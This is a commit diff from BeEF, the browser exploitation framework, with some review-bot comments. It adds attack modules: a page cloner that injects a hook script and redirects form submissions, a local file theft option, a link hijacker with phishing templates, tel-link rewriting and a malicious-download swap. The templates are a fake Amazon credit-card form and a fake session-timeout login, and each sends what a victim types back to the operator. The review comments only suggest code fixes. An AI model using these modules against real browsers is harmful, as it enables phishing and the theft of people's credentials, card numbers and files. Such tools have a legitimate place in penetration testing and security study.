@beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
end
def clone_page(url, mount, use_existing)
print_info "Cloning page at URL #{url}"
uri = URI(url)
output = uri.host
output_mod = "#{output}_mod"
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
success = false
# Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
# there is no need to implement the complex logic to handle all different cases.
# We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
# So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
# 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
# - the user modify the example.com_mod file manually
# 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
#
if use_existing.nil? || use_existing == false
begin #,"--background"
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
end
c += 1
end
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
end
end
end
end
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
success
end
private
# Replace </head> with <BeEF_hook></head>
def add_beef_hook(line)
line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
line
end
private
# check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
def is_frameable(url)
result = true
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == "https"
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
frame_opt = response["X-Frame-Options"]
if frame_opt != nil
if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
result = false
end
end
print_info "Page can be framed: [#{result}]"
result
end
def get_page_content(file_path)
file = File.open(file_path,'r')
cloned_page = file.read
file.close
cloned_page
end
def persist_page(uri, mount)
webcloner_db = BeEF::Core::Models::Webcloner.new(
:uri => uri,
:mount => mount
)
webcloner_db.save
webcloner_db
end
end
end
end
end
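Review bot: `clone_page` evaluates `File.size("#{@cloned_pages_dir + output}") > 0` without first checking that the file exists, so a `use_existing` request for a host that was never cloned raises `Errno::ENOENT` instead of reaching the `else` branch that logs the error and returns false. The REST handler added in this commit would then report it as invalid JSON. The check also looks at the raw download while the content served comes from `output_mod`, so I would assign `file_path` before the condition and test the file that is actually read: `if File.file?(file_path) && File.size(file_path) > 0`. Separately, `File.open(..., 'r').each` never closes its handle and `get_page_content` closes it only when `read` succeeds; `File.foreach` and `File.read` close the file in every case.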


@@ -0,0 +1,24 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var tel_number = "<%= @tel_number %>";
var selector = "a";
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
});


@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
link_rewrite_tel:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (TEL)"
description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
authors: ["bcoles"]
target:
working: ["ALL"]


@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Link_rewrite_tel < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end


@@ -16,7 +16,7 @@
class Java_payload < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
end
def self.options


@@ -86,6 +86,16 @@ result = '';
}
}
fileList['custom']= {
// user defined
"discover" :'',
"post" :{
'result':'<%== @target_file %>',
}
}
functionList = {
mac:{
// OS X disovery
@@ -138,11 +148,25 @@ result = '';
grabFiles(homedir,"ios")
}
}
alert("ipad")
return true;
}
},
custom:{
// Grab custom stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['custom']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"custom")
}
}
return true;
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
@@ -172,19 +196,27 @@ result = '';
function identify(){
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
// custom file is specified
if ('<%== @target_file %>' != 'autodetect') {
return "custom"
// determine a good file to steal based on platform
} else {
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
}


@@ -19,6 +19,16 @@
class Local_file_theft < BeEF::Core::Command
def self.options
return [
{'name' => 'target_file',
'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb',
'ui_label' => 'Target file',
'value' => 'autodetect'
}
]
end
def post_execute
content = {}
content['result'] = @datastore['result']


@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
beef.execute(function() {
var connection_type;
getConnectionType = function() {
var states = {};
states[Connection.UNKNOWN] = 'Unknown connection';
states[Connection.ETHERNET] = 'Ethernet connection';
states[Connection.WIFI] = 'WiFi connection';
states[Connection.CELL_2G] = 'Cell 2G connection';
states[Connection.CELL_3G] = 'Cell 3G connection';
states[Connection.CELL_4G] = 'Cell 4G connection';
states[Connection.NONE] = 'No network connection';
return states[navigator.network.connection.type];
}
try {
connection_type = getConnectionType();
} catch(e) {
connection_type = "Unable to determine connection type."
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type);
});


@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:
module:
phonegap_check_connection:
enable: true
category: "Phonegap"
name: "Check connection"
description: "Find out connection type e.g. Wifi, 3G.."
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
class Phonegap_check_connection < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -23,6 +23,7 @@ beef.execute(function() {
phonegap_details = ""
+ " name: " + device.name
+ " phonegap api: " + device.phonegap
+ " cordova api: " + device.cordova
+ " platform: " + device.platform
+ " uuid: " + device.uuid
+ " version: " + device.version;


@@ -0,0 +1,31 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// persist on over app's sleep/wake events
beef.execute(function() {
var result;
try {
document.addEventListener("resume", beef_init(), false);
result = 'success';
} catch (e) {
for(var n in e) {
result+= n + " " + e[n] + "\n";
}
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});


@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
beef:
module:
phonegap_persist_resume:
enable: true
category: "Phonegap"
name: "Persist resume"
description: "Persist over applications sleep/wake events"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
class Phonegap_persist_resume < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var maliciousurl = '<%= @malicious_file_uri %>';
var realurl = '<%= @real_file_uri %>';
var w;
var once = '<%= @do_once %>';
function doit() {
if (!beef.browser.isIE()) {
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo');
setTimeout(donext, 4500);
}
}
function donext() {
window.open(maliciousurl, 'foo');
if (once != true) setTimeout(donext, 5000);
once = true;
}
doit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});


@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
lcamtuf_download:
enable: true
category: "Social Engineering"
name: "Lcamtuf Download"
description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative <i>Content-Disposition: attachment</i> header. For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
authors: ["Bart Leppens"]
target:
user_notify: ["ALL"]
not_working: ["IE"]


@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Lcamtuf_download < BeEF::Core::Command
# set and return all options for this module
def self.options
return [{
'name' => 'real_file_uri',
'description' => 'The web accessible URI for the real file.',
'ui_label' => 'Real File Path',
'value' => 'http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869',
'width' => '300px'
},
{
'name' => 'malicious_file_uri',
'description' => 'The web accessible URI for the malicious file.',
'ui_label' => 'Malicious File Path',
'value' => '',
'width' => '300px'
},
{ 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore',
'store_fields' => ['do_once'], 'store_data' => [['false'],['true']],
'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true
}]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -0,0 +1,43 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
hijack = function(){
function send(answer){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
}
<% target = @targets.split(',') %>
$j('a').click(function(e) {
e.preventDefault();
if ($j(this).attr('href') != '')
{
if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
<%
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
file = File.open(tplpath, "r")
@template = file.read
%>
<%= @template %>
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
}
}
});
}
beef.execute(function() {
hijack();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
});
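Review bot: The embedded Ruby that loads the template builds `tplpath` from `@choosetmpl` and opens it without checking the value, so a submitted name that is not in the configured list, including one containing path separators, makes the server read a `.js` file outside the templates directory and embed it in the response. The existence check in the module's `self.options` only covers the names listed in the configuration, not the value that arrives with the command. I would check the value before opening, `raise "Invalid template #{@choosetmpl}" unless BeEF::Core::Configuration.instance.get('beef.module.simple_hijacker.templates').include?(@choosetmpl)`, and replace the open/read pair with `@template = File.read(tplpath)` so the file handle is not left open. Whether the datastore value is validated elsewhere in the framework is not visible from this section.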


@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
simple_hijacker:
enable: true
category: "Social Engineering"
name: "Simple Hijacker"
description: "Hijack clicks on links to display what you want."
templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
authors: ["gallypette"]
target:
user_notify: ['ALL']


@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Simple_hijacker < BeEF::Core::Command
def self.options
config = BeEF::Core::Configuration.instance
@templates = config.get('beef.module.simple_hijacker.templates')
# Defines which domains to target
data = []
data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
# We'll then list all templates available
tmptpl = []
@templates.each{ |template|
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
tmptpl<<[ template]
}
data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
return data
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end
end
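Review bot: `File.exists?` in the template loop of `self.options` is a deprecated alias that was removed in Ruby 3.2, and `if not` reads less clearly than `unless`; I would write `raise "Invalid template path for command template #{template}" unless File.exist?(tplpath)`. `@templates` is assigned as an instance variable on the class although it is only used inside this method, so a local variable would avoid state that outlives the call. The UI strings `'list domains you want to hijack - separed by ,'` and `'Targetted domains'` contain typos and should read "separated" and "Targeted".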


@@ -0,0 +1,28 @@
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
collect = function(){
answer = "";
$j(":input").each(function() {
answer += " "+$j(this).attr("name")+":"+$j(this).val();
});
send(answer);
}
// floating div
function writediv() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('display', 'block');
sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. 
Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
}
writediv();
$j("#confirm").click(function () {
$j('#hax').remove();
});

File diff suppressed because one or more lines are too long


@@ -0,0 +1,10 @@
var answer = confirm("Do you really want to leave us ??")
if (answer){
alert("Okay :(")
send("User chose to leave.");
window.location = $j(this).attr('href');
}
else{
alert("Okay enjoy ")
send("User chose to stay.");
}


@@ -0,0 +1,105 @@
imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
var answer= '';
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
// set up darkening
function grayOut(vis, options) {
// Pass true to gray out screen, false to ungray
// options are optional. This is a JSON object with the following (optional) properties
// opacity:0-100 // Lower number = less grayout higher = more of a blackout
// zindex: # // HTML elements with a higher zindex appear on top of the gray out
// bgcolor: (#xxxxxx) // Standard RGB Hex color code
// grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
// Because options is JSON opacity/zindex/bgcolor are all optional and can appear
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
}
// function to send response
function win(){
document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
}
// perform darkening
grayOut(true);
function checker(){
processval = document.body.lastChild.getElementsByTagName("input")[2].value;
if (processval == "Processing..") {
uname = document.body.lastChild.getElementsByTagName("input")[0].value;
pass = document.body.lastChild.getElementsByTagName("input")[1].value;
answer = uname+":"+pass
send(answer);
// set lastchild invisible
document.body.lastChild.setAttribute('style','display:none');
// lighten screen
grayOut(false);
clearInterval(credgrabber);
$j('#hax').remove();
$j('#darkenScreenObject').remove();
}
}
// floating div
function writeit() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
credgrabber = setInterval(checker,1000);
}
writeit();